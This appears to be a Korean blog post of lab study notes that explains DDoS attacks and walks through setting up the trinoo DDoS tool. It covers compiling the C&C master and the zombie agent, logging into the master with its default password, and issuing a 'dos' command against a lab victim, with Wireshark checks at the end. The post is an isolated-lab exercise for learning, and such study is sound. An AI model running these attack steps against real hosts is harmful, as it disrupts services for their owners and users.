DDOS

Date:     Updated:

카테고리:

태그:

DDOS

  • DDoS (Distribution Denial of Service)

    • 분산 서비스 거부 공격

    • DoS 공격의 발전 형태

    • 공격 시스템을 여러 대로 분산 배치하여 대량의 트래픽으로 공격대상의 서비스를 마비시키는 공격

      악성코드 등을 이용하여 Zombie PC를 획득하여 C&C서버를 통해 공격 명령을 내림

    • 기본적으로 공격의 형태가 (1 → N) vs 1

      (공격자(1) → 좀비PC(N)) vs 공격대상(1)

  • 공격 방식
    • 물리적인 파괴
    • 시스템 리소스 공격 → CPU, Memory, Disk, 특정 Application …
    • 네트워크 대역폭 공격 → 대역폭 고갈
  • 실습

    • 구성도

      화면 캡처 2022-10-06 174531

    • Master, agent 에서 gcc 설치

      # yum -y install gcc
      
    • master(C&C)에서 설정

      # gcc
      

      화면 캡처 2022-10-06 191936

      [root@localhost ~]# cd ./master
      [root@localhost master]# make
      

      화면 캡처 2022-10-06 192623

      [root@localhost master]# ls
      

      화면 캡처 2022-10-06 192705

    • agent(zombie)에서 설정

      [root@localhost ~]# cd daemon/
      [root@localhost daemon]# ls
      

      fdsafs

      C&C 서버의 주소를 입력
      [root@localhost daemon]# vi ns.c
      

      화면 캡처 2022-10-06 192924

      실행 파일 컴파일을 위해서 master 디렉터리의 내용을 복사
      [root@localhost daemon]# cp /root/master/* /root/daemon/
      [root@localhost daemon]# ls
      

      화면 캡처 2022-10-06 193135

      파일 수정
      [root@localhost daemon]# vim Makefile
      

      화면 캡처 2022-10-06 194016

      컴파일 수행
      [root@localhost daemon]# make
      

      화면 캡처 2022-10-06 194158

      화면 캡처 2022-10-06 194214

    • master(C&C) 설정

      [root@localhost master]# ./master 
      ?? gOrave (대문자 O)
      

      화면 캡처 2022-10-06 194241

      포트 번호 확인
      [root@localhost master]# netstat -antup | grep master
      

      화면 캡처 2022-10-06 194451

    • agent(zombie)

      master 에 연결
      [root@localhost daemon]# ./daemon
      [root@localhost daemon]# netstat -antup | grep daemon
      

      화면 캡처 2022-10-06 194547

    • kali (attacker)에서 공격수행

      └─# telnet 172.16.0.111 27665
      

      vcxzvczxvcz

      betaalmostdone 입력
      

      화면 캡처 2022-10-06 201435

      정보확인
      trinoo> info
      

      화면 캡처 2022-10-06 194630

      현재 연결된 agent 목록
      trinoo> bcast
      

      화면 캡처 2022-10-06 194700

      공격
      trinoo> dos 172.16.0.100(xp)
      
    • 와이어샤크 확인

      kali(attacker)

      화면 캡처 2022-10-06 200930

      xp (victim)

      화면 캡처 2022-10-06 200737

dos 카테고리 내 다른 글 보러가기

댓글 남기기